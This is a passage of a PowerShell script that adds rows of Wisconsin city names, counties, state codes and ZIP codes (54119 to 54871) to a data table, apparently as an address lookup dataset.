$Cities.Rows.Add("Dunbar","Marinette","Wisconsin","WI","55","54119") + $null = $Cities.Rows.Add("Fence","Florence","Wisconsin","WI","55","54120") + $null = $Cities.Rows.Add("Florence","Florence","Wisconsin","WI","55","54121") + $null = $Cities.Rows.Add("Forest junction","Calumet","Wisconsin","WI","55","54123") + $null = $Cities.Rows.Add("Gillett","Oconto","Wisconsin","WI","55","54124") + $null = $Cities.Rows.Add("Goodman","Marinette","Wisconsin","WI","55","54125") + $null = $Cities.Rows.Add("Greenleaf","Brown","Wisconsin","WI","55","54126") + $null = $Cities.Rows.Add("Green valley","Shawano","Wisconsin","WI","55","54127") + $null = $Cities.Rows.Add("Gresham","Shawano","Wisconsin","WI","55","54128") + $null = $Cities.Rows.Add("Hilbert","Calumet","Wisconsin","WI","55","54129") + $null = $Cities.Rows.Add("Kaukauna","Outagamie","Wisconsin","WI","55","54130") + $null = $Cities.Rows.Add("Keshena","Menominee","Wisconsin","WI","55","54135") + $null = $Cities.Rows.Add("Kimberly","Outagamie","Wisconsin","WI","55","54136") + $null = $Cities.Rows.Add("Krakow","Shawano","Wisconsin","WI","55","54137") + $null = $Cities.Rows.Add("Lakewood","Oconto","Wisconsin","WI","55","54138") + $null = $Cities.Rows.Add("Stiles","Oconto","Wisconsin","WI","55","54139") + $null = $Cities.Rows.Add("Little chute","Outagamie","Wisconsin","WI","55","54140") + $null = $Cities.Rows.Add("Little suamico","Oconto","Wisconsin","WI","55","54141") + $null = $Cities.Rows.Add("Marinette","Marinette","Wisconsin","WI","55","54143") + $null = $Cities.Rows.Add("Mountain","Oconto","Wisconsin","WI","55","54149") + $null = $Cities.Rows.Add("Neopit","Menominee","Wisconsin","WI","55","54150") + $null = $Cities.Rows.Add("Niagara","Marinette","Wisconsin","WI","55","54151") + $null = $Cities.Rows.Add("Nichols","Outagamie","Wisconsin","WI","55","54152") + $null = $Cities.Rows.Add("Oconto","Oconto","Wisconsin","WI","55","54153") + $null = $Cities.Rows.Add("Oconto falls","Oconto","Wisconsin","WI","55","54154") + $null = $Cities.Rows.Add("Oneida","Brown","Wisconsin","WI","55","54155") + $null = $Cities.Rows.Add("Pembine","Marinette","Wisconsin","WI","55","54156") + $null = $Cities.Rows.Add("Peshtigo","Marinette","Wisconsin","WI","55","54157") + $null = $Cities.Rows.Add("Porterfield","Marinette","Wisconsin","WI","55","54159") + $null = $Cities.Rows.Add("Potter","Calumet","Wisconsin","WI","55","54160") + $null = $Cities.Rows.Add("Pound","Marinette","Wisconsin","WI","55","54161") + $null = $Cities.Rows.Add("Pulaski","Brown","Wisconsin","WI","55","54162") + $null = $Cities.Rows.Add("Seymour","Outagamie","Wisconsin","WI","55","54165") + $null = $Cities.Rows.Add("Shawano","Shawano","Wisconsin","WI","55","54166") + $null = $Cities.Rows.Add("Sherwood","Calumet","Wisconsin","WI","55","54169") + $null = $Cities.Rows.Add("Shiocton","Outagamie","Wisconsin","WI","55","54170") + $null = $Cities.Rows.Add("Sobieski","Oconto","Wisconsin","WI","55","54171") + $null = $Cities.Rows.Add("Suamico","Brown","Wisconsin","WI","55","54173") + $null = $Cities.Rows.Add("Suring","Oconto","Wisconsin","WI","55","54174") + $null = $Cities.Rows.Add("Townsend","Oconto","Wisconsin","WI","55","54175") + $null = $Cities.Rows.Add("Wausaukee","Marinette","Wisconsin","WI","55","54177") + $null = $Cities.Rows.Add("Wrightstown","Brown","Wisconsin","WI","55","54180") + $null = $Cities.Rows.Add("Zcta 541hh","Brown","Wisconsin","WI","55","541HH") + $null = $Cities.Rows.Add("Zcta 541xx","Menominee","Wisconsin","WI","55","541XX") + $null = $Cities.Rows.Add("Algoma","Kewaunee","Wisconsin","WI","55","54201") + $null = $Cities.Rows.Add("Baileys harbor","Door","Wisconsin","WI","55","54202") + $null = $Cities.Rows.Add("Brussels","Door","Wisconsin","WI","55","54204") + $null = $Cities.Rows.Add("Casco","Kewaunee","Wisconsin","WI","55","54205") + $null = $Cities.Rows.Add("Collins","Manitowoc","Wisconsin","WI","55","54207") + $null = $Cities.Rows.Add("Denmark","Brown","Wisconsin","WI","55","54208") + $null = $Cities.Rows.Add("Egg harbor","Door","Wisconsin","WI","55","54209") + $null = $Cities.Rows.Add("Ellison bay","Door","Wisconsin","WI","55","54210") + $null = $Cities.Rows.Add("Ephraim","Door","Wisconsin","WI","55","54211") + $null = $Cities.Rows.Add("Fish creek","Door","Wisconsin","WI","55","54212") + $null = $Cities.Rows.Add("Forestville","Door","Wisconsin","WI","55","54213") + $null = $Cities.Rows.Add("Francis creek","Manitowoc","Wisconsin","WI","55","54214") + $null = $Cities.Rows.Add("Kellnersville","Manitowoc","Wisconsin","WI","55","54215") + $null = $Cities.Rows.Add("Kewaunee","Kewaunee","Wisconsin","WI","55","54216") + $null = $Cities.Rows.Add("Luxemburg","Kewaunee","Wisconsin","WI","55","54217") + $null = $Cities.Rows.Add("Manitowoc","Manitowoc","Wisconsin","WI","55","54220") + $null = $Cities.Rows.Add("Maribel","Manitowoc","Wisconsin","WI","55","54227") + $null = $Cities.Rows.Add("Mishicot","Manitowoc","Wisconsin","WI","55","54228") + $null = $Cities.Rows.Add("New franken","Brown","Wisconsin","WI","55","54229") + $null = $Cities.Rows.Add("Reedsville","Manitowoc","Wisconsin","WI","55","54230") + $null = $Cities.Rows.Add("Saint nazianz","Manitowoc","Wisconsin","WI","55","54232") + $null = $Cities.Rows.Add("Sister bay","Door","Wisconsin","WI","55","54234") + $null = $Cities.Rows.Add("Sturgeon bay","Door","Wisconsin","WI","55","54235") + $null = $Cities.Rows.Add("Tisch mills","Manitowoc","Wisconsin","WI","55","54240") + $null = $Cities.Rows.Add("Two rivers","Manitowoc","Wisconsin","WI","55","54241") + $null = $Cities.Rows.Add("Valders","Manitowoc","Wisconsin","WI","55","54245") + $null = $Cities.Rows.Add("Washington islan","Door","Wisconsin","WI","55","54246") + $null = $Cities.Rows.Add("Whitelaw","Manitowoc","Wisconsin","WI","55","54247") + $null = $Cities.Rows.Add("Zcta 542hh","Brown","Wisconsin","WI","55","542HH") + $null = $Cities.Rows.Add("Allouez","Brown","Wisconsin","WI","55","54301") + $null = $Cities.Rows.Add("Green bay","Brown","Wisconsin","WI","55","54302") + $null = $Cities.Rows.Add("Howard","Brown","Wisconsin","WI","55","54303") + $null = $Cities.Rows.Add("Ashwaubenon","Brown","Wisconsin","WI","55","54304") + $null = $Cities.Rows.Add("Green bay","Brown","Wisconsin","WI","55","54311") + $null = $Cities.Rows.Add("Green bay","Brown","Wisconsin","WI","55","54313") + $null = $Cities.Rows.Add("Zcta 543hh","Brown","Wisconsin","WI","55","543HH") + $null = $Cities.Rows.Add("Wausau","Marathon","Wisconsin","WI","55","54401") + $null = $Cities.Rows.Add("Wausau","Marathon","Wisconsin","WI","55","54403") + $null = $Cities.Rows.Add("Abbotsford","Clark","Wisconsin","WI","55","54405") + $null = $Cities.Rows.Add("Amherst","Portage","Wisconsin","WI","55","54406") + $null = $Cities.Rows.Add("Amherst junction","Portage","Wisconsin","WI","55","54407") + $null = $Cities.Rows.Add("Aniwa","Marathon","Wisconsin","WI","55","54408") + $null = $Cities.Rows.Add("Antigo","Langlade","Wisconsin","WI","55","54409") + $null = $Cities.Rows.Add("Arpin","Wood","Wisconsin","WI","55","54410") + $null = $Cities.Rows.Add("Hamburg","Marathon","Wisconsin","WI","55","54411") + $null = $Cities.Rows.Add("Auburndale","Wood","Wisconsin","WI","55","54412") + $null = $Cities.Rows.Add("Babcock","Wood","Wisconsin","WI","55","54413") + $null = $Cities.Rows.Add("Birnamwood","Shawano","Wisconsin","WI","55","54414") + $null = $Cities.Rows.Add("Bowler","Shawano","Wisconsin","WI","55","54416") + $null = $Cities.Rows.Add("Brokaw","Marathon","Wisconsin","WI","55","54417") + $null = $Cities.Rows.Add("Bryant","Langlade","Wisconsin","WI","55","54418") + $null = $Cities.Rows.Add("Chili","Clark","Wisconsin","WI","55","54420") + $null = $Cities.Rows.Add("Colby","Clark","Wisconsin","WI","55","54421") + $null = $Cities.Rows.Add("Curtiss","Clark","Wisconsin","WI","55","54422") + $null = $Cities.Rows.Add("Custer","Portage","Wisconsin","WI","55","54423") + $null = $Cities.Rows.Add("Deerbrook","Langlade","Wisconsin","WI","55","54424") + $null = $Cities.Rows.Add("Dorchester","Clark","Wisconsin","WI","55","54425") + $null = $Cities.Rows.Add("Fenwood","Marathon","Wisconsin","WI","55","54426") + $null = $Cities.Rows.Add("Eland","Marathon","Wisconsin","WI","55","54427") + $null = $Cities.Rows.Add("Elcho","Langlade","Wisconsin","WI","55","54428") + $null = $Cities.Rows.Add("Elton","Langlade","Wisconsin","WI","55","54430") + $null = $Cities.Rows.Add("Gilman","Taylor","Wisconsin","WI","55","54433") + $null = $Cities.Rows.Add("Gleason","Lincoln","Wisconsin","WI","55","54435") + $null = $Cities.Rows.Add("Granton","Clark","Wisconsin","WI","55","54436") + $null = $Cities.Rows.Add("Greenwood","Clark","Wisconsin","WI","55","54437") + $null = $Cities.Rows.Add("Hatley","Marathon","Wisconsin","WI","55","54440") + $null = $Cities.Rows.Add("Hewitt","Wood","Wisconsin","WI","55","54441") + $null = $Cities.Rows.Add("Irma","Lincoln","Wisconsin","WI","55","54442") + $null = $Cities.Rows.Add("Junction city","Portage","Wisconsin","WI","55","54443") + $null = $Cities.Rows.Add("Loyal","Clark","Wisconsin","WI","55","54446") + $null = $Cities.Rows.Add("Lublin","Taylor","Wisconsin","WI","55","54447") + $null = $Cities.Rows.Add("Marathon","Marathon","Wisconsin","WI","55","54448") + $null = $Cities.Rows.Add("Marshfield","Wood","Wisconsin","WI","55","54449") + $null = $Cities.Rows.Add("Medford","Taylor","Wisconsin","WI","55","54451") + $null = $Cities.Rows.Add("Merrill","Lincoln","Wisconsin","WI","55","54452") + $null = $Cities.Rows.Add("Milladore","Wood","Wisconsin","WI","55","54454") + $null = $Cities.Rows.Add("Mosinee","Marathon","Wisconsin","WI","55","54455") + $null = $Cities.Rows.Add("Neillsville","Clark","Wisconsin","WI","55","54456") + $null = $Cities.Rows.Add("Nekoosa","Wood","Wisconsin","WI","55","54457") + $null = $Cities.Rows.Add("Ogema","Price","Wisconsin","WI","55","54459") + $null = $Cities.Rows.Add("Owen","Clark","Wisconsin","WI","55","54460") + $null = $Cities.Rows.Add("Pearson","Langlade","Wisconsin","WI","55","54462") + $null = $Cities.Rows.Add("Pelican lake","Oneida","Wisconsin","WI","55","54463") + $null = $Cities.Rows.Add("Pickerel","Langlade","Wisconsin","WI","55","54465") + $null = $Cities.Rows.Add("Pittsville","Wood","Wisconsin","WI","55","54466") + $null = $Cities.Rows.Add("Plover","Portage","Wisconsin","WI","55","54467") + $null = $Cities.Rows.Add("Port edwards","Wood","Wisconsin","WI","55","54469") + $null = $Cities.Rows.Add("Rib lake","Taylor","Wisconsin","WI","55","54470") + $null = $Cities.Rows.Add("Ringle","Marathon","Wisconsin","WI","55","54471") + $null = $Cities.Rows.Add("Rosholt","Portage","Wisconsin","WI","55","54473") + $null = $Cities.Rows.Add("Rothschild","Marathon","Wisconsin","WI","55","54474") + $null = $Cities.Rows.Add("Rudolph","Wood","Wisconsin","WI","55","54475") + $null = $Cities.Rows.Add("Schofield","Marathon","Wisconsin","WI","55","54476") + $null = $Cities.Rows.Add("Spencer","Marathon","Wisconsin","WI","55","54479") + $null = $Cities.Rows.Add("Stetsonville","Taylor","Wisconsin","WI","55","54480") + $null = $Cities.Rows.Add("Stevens point","Portage","Wisconsin","WI","55","54481") + $null = $Cities.Rows.Add("Stratford","Marathon","Wisconsin","WI","55","54484") + $null = $Cities.Rows.Add("Summit lake","Langlade","Wisconsin","WI","55","54485") + $null = $Cities.Rows.Add("Tigerton","Shawano","Wisconsin","WI","55","54486") + $null = $Cities.Rows.Add("Tomahawk","Lincoln","Wisconsin","WI","55","54487") + $null = $Cities.Rows.Add("Unity","Clark","Wisconsin","WI","55","54488") + $null = $Cities.Rows.Add("Vesper","Wood","Wisconsin","WI","55","54489") + $null = $Cities.Rows.Add("Westboro","Taylor","Wisconsin","WI","55","54490") + $null = $Cities.Rows.Add("White lake","Langlade","Wisconsin","WI","55","54491") + $null = $Cities.Rows.Add("Willard","Clark","Wisconsin","WI","55","54493") + $null = $Cities.Rows.Add("Wisconsin rapids","Wood","Wisconsin","WI","55","54494") + $null = $Cities.Rows.Add("Wisconsin rapids","Wood","Wisconsin","WI","55","54495") + $null = $Cities.Rows.Add("Withee","Clark","Wisconsin","WI","55","54498") + $null = $Cities.Rows.Add("Wittenberg","Shawano","Wisconsin","WI","55","54499") + $null = $Cities.Rows.Add("Zcta 544hh","Adams","Wisconsin","WI","55","544HH") + $null = $Cities.Rows.Add("Zcta 544xx","Jackson","Wisconsin","WI","55","544XX") + $null = $Cities.Rows.Add("Monico","Oneida","Wisconsin","WI","55","54501") + $null = $Cities.Rows.Add("Cavour","Forest","Wisconsin","WI","55","54511") + $null = $Cities.Rows.Add("Boulder junction","Vilas","Wisconsin","WI","55","54512") + $null = $Cities.Rows.Add("Brantwood","Price","Wisconsin","WI","55","54513") + $null = $Cities.Rows.Add("Butternut","Ashland","Wisconsin","WI","55","54514") + $null = $Cities.Rows.Add("Catawba","Price","Wisconsin","WI","55","54515") + $null = $Cities.Rows.Add("Clam lake","Ashland","Wisconsin","WI","55","54517") + $null = $Cities.Rows.Add("Conover","Vilas","Wisconsin","WI","55","54519") + $null = $Cities.Rows.Add("Crandon","Forest","Wisconsin","WI","55","54520") + $null = $Cities.Rows.Add("Eagle river","Vilas","Wisconsin","WI","55","54521") + $null = $Cities.Rows.Add("Fifield","Price","Wisconsin","WI","55","54524") + $null = $Cities.Rows.Add("Gile","Iron","Wisconsin","WI","55","54525") + $null = $Cities.Rows.Add("Ingram","Rusk","Wisconsin","WI","55","54526") + $null = $Cities.Rows.Add("Glidden","Ashland","Wisconsin","WI","55","54527") + $null = $Cities.Rows.Add("Harshaw","Oneida","Wisconsin","WI","55","54529") + $null = $Cities.Rows.Add("Hawkins","Rusk","Wisconsin","WI","55","54530") + $null = $Cities.Rows.Add("Hazelhurst","Oneida","Wisconsin","WI","55","54531") + $null = $Cities.Rows.Add("Hurley","Iron","Wisconsin","WI","55","54534") + $null = $Cities.Rows.Add("Iron belt","Iron","Wisconsin","WI","55","54536") + $null = $Cities.Rows.Add("Kennan","Price","Wisconsin","WI","55","54537") + $null = $Cities.Rows.Add("Lac du flambeau","Vilas","Wisconsin","WI","55","54538") + $null = $Cities.Rows.Add("Lake tomahawk","Oneida","Wisconsin","WI","55","54539") + $null = $Cities.Rows.Add("Land o lakes","Vilas","Wisconsin","WI","55","54540") + $null = $Cities.Rows.Add("Laona","Forest","Wisconsin","WI","55","54541") + $null = $Cities.Rows.Add("Alvin","Florence","Wisconsin","WI","55","54542") + $null = $Cities.Rows.Add("Mc naughton","Oneida","Wisconsin","WI","55","54543") + $null = $Cities.Rows.Add("Manitowish water","Vilas","Wisconsin","WI","55","54545") + $null = $Cities.Rows.Add("Mellen","Ashland","Wisconsin","WI","55","54546") + $null = $Cities.Rows.Add("Mercer","Iron","Wisconsin","WI","55","54547") + $null = $Cities.Rows.Add("Minocqua","Oneida","Wisconsin","WI","55","54548") + $null = $Cities.Rows.Add("Pence","Iron","Wisconsin","WI","55","54550") + $null = $Cities.Rows.Add("Park falls","Price","Wisconsin","WI","55","54552") + $null = $Cities.Rows.Add("Phelps","Vilas","Wisconsin","WI","55","54554") + $null = $Cities.Rows.Add("Phillips","Price","Wisconsin","WI","55","54555") + $null = $Cities.Rows.Add("Prentice","Price","Wisconsin","WI","55","54556") + $null = $Cities.Rows.Add("Winchester","Vilas","Wisconsin","WI","55","54557") + $null = $Cities.Rows.Add("Saint germain","Vilas","Wisconsin","WI","55","54558") + $null = $Cities.Rows.Add("Saxon","Iron","Wisconsin","WI","55","54559") + $null = $Cities.Rows.Add("Sayner","Vilas","Wisconsin","WI","55","54560") + $null = $Cities.Rows.Add("Starlake","Vilas","Wisconsin","WI","55","54561") + $null = $Cities.Rows.Add("Three lakes","Oneida","Wisconsin","WI","55","54562") + $null = $Cities.Rows.Add("Tony","Rusk","Wisconsin","WI","55","54563") + $null = $Cities.Rows.Add("Tripoli","Oneida","Wisconsin","WI","55","54564") + $null = $Cities.Rows.Add("Upson","Iron","Wisconsin","WI","55","54565") + $null = $Cities.Rows.Add("Wabeno","Forest","Wisconsin","WI","55","54566") + $null = $Cities.Rows.Add("Woodruff","Vilas","Wisconsin","WI","55","54568") + $null = $Cities.Rows.Add("Zcta 545hh","Ashland","Wisconsin","WI","55","545HH") + $null = $Cities.Rows.Add("Zcta 545xx","Forest","Wisconsin","WI","55","545XX") + $null = $Cities.Rows.Add("La crosse","La Crosse","Wisconsin","WI","55","54601") + $null = $Cities.Rows.Add("La crosse","La Crosse","Wisconsin","WI","55","54603") + $null = $Cities.Rows.Add("Alma","Buffalo","Wisconsin","WI","55","54610") + $null = $Cities.Rows.Add("Alma center","Jackson","Wisconsin","WI","55","54611") + $null = $Cities.Rows.Add("Arcadia","Trempealeau","Wisconsin","WI","55","54612") + $null = $Cities.Rows.Add("Arkdale","Adams","Wisconsin","WI","55","54613") + $null = $Cities.Rows.Add("Bangor","La Crosse","Wisconsin","WI","55","54614") + $null = $Cities.Rows.Add("Black river fall","Jackson","Wisconsin","WI","55","54615") + $null = $Cities.Rows.Add("Blair","Trempealeau","Wisconsin","WI","55","54616") + $null = $Cities.Rows.Add("Cutler","Juneau","Wisconsin","WI","55","54618") + $null = $Cities.Rows.Add("Cashton","Monroe","Wisconsin","WI","55","54619") + $null = $Cities.Rows.Add("Chaseburg","Vernon","Wisconsin","WI","55","54621") + $null = $Cities.Rows.Add("Waumandee","Buffalo","Wisconsin","WI","55","54622") + $null = $Cities.Rows.Add("Coon valley","Vernon","Wisconsin","WI","55","54623") + $null = $Cities.Rows.Add("Victory","Vernon","Wisconsin","WI","55","54624") + $null = $Cities.Rows.Add("Dodge","Trempealeau","Wisconsin","WI","55","54625") + $null = $Cities.Rows.Add("Eastman","Crawford","Wisconsin","WI","55","54626") + $null = $Cities.Rows.Add("Ettrick","Trempealeau","Wisconsin","WI","55","54627") + $null = $Cities.Rows.Add("Ferryville","Crawford","Wisconsin","WI","55","54628") + $null = $Cities.Rows.Add("Fountain city","Buffalo","Wisconsin","WI","55","54629") + $null = $Cities.Rows.Add("Galesville","Trempealeau","Wisconsin","WI","55","54630") + $null = $Cities.Rows.Add("Gays mills","Crawford","Wisconsin","WI","55","54631") + $null = $Cities.Rows.Add("Genoa","Vernon","Wisconsin","WI","55","54632") + $null = $Cities.Rows.Add("Yuba","Vernon","Wisconsin","WI","55","54634") + $null = $Cities.Rows.Add("Northfield","Jackson","Wisconsin","WI","55","54635") + $null = $Cities.Rows.Add("Holmen","La Crosse","Wisconsin","WI","55","54636") + $null = $Cities.Rows.Add("Hustler","Juneau","Wisconsin","WI","55","54637") + $null = $Cities.Rows.Add("Kendall","Monroe","Wisconsin","WI","55","54638") + $null = $Cities.Rows.Add("West lima","Vernon","Wisconsin","WI","55","54639") + $null = $Cities.Rows.Add("Lynxville","Crawford","Wisconsin","WI","55","54640") + $null = $Cities.Rows.Add("Melrose","Jackson","Wisconsin","WI","55","54642") + $null = $Cities.Rows.Add("Mindoro","La Crosse","Wisconsin","WI","55","54644") + $null = $Cities.Rows.Add("Mount sterling","Crawford","Wisconsin","WI","55","54645") + $null = $Cities.Rows.Add("Necedah","Juneau","Wisconsin","WI","55","54646") + $null = $Cities.Rows.Add("Norwalk","Monroe","Wisconsin","WI","55","54648") + $null = $Cities.Rows.Add("Onalaska","La Crosse","Wisconsin","WI","55","54650") + $null = $Cities.Rows.Add("Ontario","Vernon","Wisconsin","WI","55","54651") + $null = $Cities.Rows.Add("Readstown","Vernon","Wisconsin","WI","55","54652") + $null = $Cities.Rows.Add("Rockland","La Crosse","Wisconsin","WI","55","54653") + $null = $Cities.Rows.Add("Seneca","Crawford","Wisconsin","WI","55","54654") + $null = $Cities.Rows.Add("Soldiers grove","Crawford","Wisconsin","WI","55","54655") + $null = $Cities.Rows.Add("Sparta","Monroe","Wisconsin","WI","55","54656") + $null = $Cities.Rows.Add("Steuben","Crawford","Wisconsin","WI","55","54657") + $null = $Cities.Rows.Add("Stoddard","Vernon","Wisconsin","WI","55","54658") + $null = $Cities.Rows.Add("Taylor","Jackson","Wisconsin","WI","55","54659") + $null = $Cities.Rows.Add("Wyeville","Monroe","Wisconsin","WI","55","54660") + $null = $Cities.Rows.Add("Trempealeau","Trempealeau","Wisconsin","WI","55","54661") + $null = $Cities.Rows.Add("Viola","Richland","Wisconsin","WI","55","54664") + $null = $Cities.Rows.Add("Viroqua","Vernon","Wisconsin","WI","55","54665") + $null = $Cities.Rows.Add("Warrens","Monroe","Wisconsin","WI","55","54666") + $null = $Cities.Rows.Add("Westby","Vernon","Wisconsin","WI","55","54667") + $null = $Cities.Rows.Add("West salem","La Crosse","Wisconsin","WI","55","54669") + $null = $Cities.Rows.Add("Wilton","Monroe","Wisconsin","WI","55","54670") + $null = $Cities.Rows.Add("Zcta 546hh","Adams","Wisconsin","WI","55","546HH") + $null = $Cities.Rows.Add("Zcta 546xx","Jackson","Wisconsin","WI","55","546XX") + $null = $Cities.Rows.Add("Eau claire","Eau Claire","Wisconsin","WI","55","54701") + $null = $Cities.Rows.Add("Eau claire","Eau Claire","Wisconsin","WI","55","54703") + $null = $Cities.Rows.Add("Altoona","Eau Claire","Wisconsin","WI","55","54720") + $null = $Cities.Rows.Add("Arkansaw","Pepin","Wisconsin","WI","55","54721") + $null = $Cities.Rows.Add("Augusta","Eau Claire","Wisconsin","WI","55","54722") + $null = $Cities.Rows.Add("Bay city","Pierce","Wisconsin","WI","55","54723") + $null = $Cities.Rows.Add("Bloomer","Chippewa","Wisconsin","WI","55","54724") + $null = $Cities.Rows.Add("Boyceville","Dunn","Wisconsin","WI","55","54725") + $null = $Cities.Rows.Add("Boyd","Chippewa","Wisconsin","WI","55","54726") + $null = $Cities.Rows.Add("Cadott","Chippewa","Wisconsin","WI","55","54727") + $null = $Cities.Rows.Add("Chetek","Barron","Wisconsin","WI","55","54728") + $null = $Cities.Rows.Add("Chippewa falls","Chippewa","Wisconsin","WI","55","54729") + $null = $Cities.Rows.Add("Colfax","Dunn","Wisconsin","WI","55","54730") + $null = $Cities.Rows.Add("Conrath","Rusk","Wisconsin","WI","55","54731") + $null = $Cities.Rows.Add("Cornell","Chippewa","Wisconsin","WI","55","54732") + $null = $Cities.Rows.Add("Dallas","Barron","Wisconsin","WI","55","54733") + $null = $Cities.Rows.Add("Downing","Dunn","Wisconsin","WI","55","54734") + $null = $Cities.Rows.Add("Durand","Pepin","Wisconsin","WI","55","54736") + $null = $Cities.Rows.Add("Eau galle","Dunn","Wisconsin","WI","55","54737") + $null = $Cities.Rows.Add("Eleva","Eau Claire","Wisconsin","WI","55","54738") + $null = $Cities.Rows.Add("Elk mound","Dunn","Wisconsin","WI","55","54739") + $null = $Cities.Rows.Add("Elmwood","Pierce","Wisconsin","WI","55","54740") + $null = $Cities.Rows.Add("Fairchild","Eau Claire","Wisconsin","WI","55","54741") + $null = $Cities.Rows.Add("Fall creek","Eau Claire","Wisconsin","WI","55","54742") + $null = $Cities.Rows.Add("Holcombe","Chippewa","Wisconsin","WI","55","54745") + $null = $Cities.Rows.Add("Humbird","Clark","Wisconsin","WI","55","54746") + $null = $Cities.Rows.Add("Independence","Trempealeau","Wisconsin","WI","55","54747") + $null = $Cities.Rows.Add("Jim falls","Chippewa","Wisconsin","WI","55","54748") + $null = $Cities.Rows.Add("Knapp","Dunn","Wisconsin","WI","55","54749") + $null = $Cities.Rows.Add("Maiden rock","Pierce","Wisconsin","WI","55","54750") + $null = $Cities.Rows.Add("Menomonie","Dunn","Wisconsin","WI","55","54751") + $null = $Cities.Rows.Add("Merrillan","Jackson","Wisconsin","WI","55","54754") + $null = $Cities.Rows.Add("Modena","Buffalo","Wisconsin","WI","55","54755") + $null = $Cities.Rows.Add("Nelson","Buffalo","Wisconsin","WI","55","54756") + $null = $Cities.Rows.Add("New auburn","Chippewa","Wisconsin","WI","55","54757") + $null = $Cities.Rows.Add("Osseo","Trempealeau","Wisconsin","WI","55","54758") + $null = $Cities.Rows.Add("Pepin","Pepin","Wisconsin","WI","55","54759") + $null = $Cities.Rows.Add("Pigeon falls","Trempealeau","Wisconsin","WI","55","54760") + $null = $Cities.Rows.Add("Plum city","Pierce","Wisconsin","WI","55","54761") + $null = $Cities.Rows.Add("Prairie farm","Barron","Wisconsin","WI","55","54762") + $null = $Cities.Rows.Add("Ridgeland","Dunn","Wisconsin","WI","55","54763") + $null = $Cities.Rows.Add("Sheldon","Rusk","Wisconsin","WI","55","54766") + $null = $Cities.Rows.Add("Spring valley","Pierce","Wisconsin","WI","55","54767") + $null = $Cities.Rows.Add("Stanley","Chippewa","Wisconsin","WI","55","54768") + $null = $Cities.Rows.Add("Stockholm","Pepin","Wisconsin","WI","55","54769") + $null = $Cities.Rows.Add("Strum","Trempealeau","Wisconsin","WI","55","54770") + $null = $Cities.Rows.Add("Thorp","Clark","Wisconsin","WI","55","54771") + $null = $Cities.Rows.Add("Wheeler","Dunn","Wisconsin","WI","55","54772") + $null = $Cities.Rows.Add("Whitehall","Trempealeau","Wisconsin","WI","55","54773") + $null = $Cities.Rows.Add("Zcta 547hh","Barron","Wisconsin","WI","55","547HH") + $null = $Cities.Rows.Add("Zcta 547xx","Jackson","Wisconsin","WI","55","547XX") + $null = $Cities.Rows.Add("Spooner","Washburn","Wisconsin","WI","55","54801") + $null = $Cities.Rows.Add("Almena","Barron","Wisconsin","WI","55","54805") + $null = $Cities.Rows.Add("Moquah","Ashland","Wisconsin","WI","55","54806") + $null = $Cities.Rows.Add("Balsam lake","Polk","Wisconsin","WI","55","54810") + $null = $Cities.Rows.Add("Barron","Barron","Wisconsin","WI","55","54812") + $null = $Cities.Rows.Add("Barronett","Barron","Wisconsin","WI","55","54813") + $null = $Cities.Rows.Add("Bayfield","Bayfield","Wisconsin","WI","55","54814") + $null = $Cities.Rows.Add("Birchwood","Washburn","Wisconsin","WI","55","54817") + $null = $Cities.Rows.Add("Bruce","Rusk","Wisconsin","WI","55","54819") + $null = $Cities.Rows.Add("Brule","Douglas","Wisconsin","WI","55","54820") + $null = $Cities.Rows.Add("Cable","Bayfield","Wisconsin","WI","55","54821") + $null = $Cities.Rows.Add("Cameron","Barron","Wisconsin","WI","55","54822") + $null = $Cities.Rows.Add("Centuria","Polk","Wisconsin","WI","55","54824") + $null = $Cities.Rows.Add("Comstock","Barron","Wisconsin","WI","55","54826") + $null = $Cities.Rows.Add("Cornucopia","Bayfield","Wisconsin","WI","55","54827") + $null = $Cities.Rows.Add("New post","Sawyer","Wisconsin","WI","55","54828") + $null = $Cities.Rows.Add("Cumberland","Barron","Wisconsin","WI","55","54829") + $null = $Cities.Rows.Add("Dairyland","Burnett","Wisconsin","WI","55","54830") + $null = $Cities.Rows.Add("Drummond","Bayfield","Wisconsin","WI","55","54832") + $null = $Cities.Rows.Add("Edgewater","Sawyer","Wisconsin","WI","55","54834") + $null = $Cities.Rows.Add("Exeland","Sawyer","Wisconsin","WI","55","54835") + $null = $Cities.Rows.Add("Foxboro","Douglas","Wisconsin","WI","55","54836") + $null = $Cities.Rows.Add("Clam falls","Polk","Wisconsin","WI","55","54837") + $null = $Cities.Rows.Add("Gordon","Douglas","Wisconsin","WI","55","54838") + $null = $Cities.Rows.Add("Grand view","Bayfield","Wisconsin","WI","55","54839") + $null = $Cities.Rows.Add("Evergreen","Burnett","Wisconsin","WI","55","54840") + $null = $Cities.Rows.Add("Haugen","Barron","Wisconsin","WI","55","54841") + $null = $Cities.Rows.Add("Hawthorne","Douglas","Wisconsin","WI","55","54842") + $null = $Cities.Rows.Add("North woods beac","Sawyer","Wisconsin","WI","55","54843") + $null = $Cities.Rows.Add("Herbster","Bayfield","Wisconsin","WI","55","54844") + $null = $Cities.Rows.Add("Hertel","Burnett","Wisconsin","WI","55","54845") + $null = $Cities.Rows.Add("High bridge","Ashland","Wisconsin","WI","55","54846") + $null = $Cities.Rows.Add("Iron river","Bayfield","Wisconsin","WI","55","54847") + $null = $Cities.Rows.Add("Ladysmith","Rusk","Wisconsin","WI","55","54848") + $null = $Cities.Rows.Add("Lake nebagamon","Douglas","Wisconsin","WI","55","54849") + $null = $Cities.Rows.Add("La pointe","Ashland","Wisconsin","WI","55","54850") + $null = $Cities.Rows.Add("Luck","Polk","Wisconsin","WI","55","54853") + $null = $Cities.Rows.Add("Maple","Douglas","Wisconsin","WI","55","54854") + $null = $Cities.Rows.Add("Marengo","Ashland","Wisconsin","WI","55","54855") + $null = $Cities.Rows.Add("Delta","Bayfield","Wisconsin","WI","55","54856") + $null = $Cities.Rows.Add("Mikana","Barron","Wisconsin","WI","55","54857") + $null = $Cities.Rows.Add("Milltown","Polk","Wisconsin","WI","55","54858") + $null = $Cities.Rows.Add("Minong","Washburn","Wisconsin","WI","55","54859") + $null = $Cities.Rows.Add("Odanah","Ashland","Wisconsin","WI","55","54861") + $null = $Cities.Rows.Add("Ojibwa","Sawyer","Wisconsin","WI","55","54862") + $null = $Cities.Rows.Add("Poplar","Douglas","Wisconsin","WI","55","54864") + $null = $Cities.Rows.Add("Port wing","Bayfield","Wisconsin","WI","55","54865") + $null = $Cities.Rows.Add("Radisson","Sawyer","Wisconsin","WI","55","54867") + $null = $Cities.Rows.Add("Canton","Barron","Wisconsin","WI","55","54868") + $null = $Cities.Rows.Add("Sarona","Washburn","Wisconsin","WI","55","54870") + $null = $Cities.Rows.Add("Shell lake","Washburn","Wisconsin","WI","55","54871") + $null = 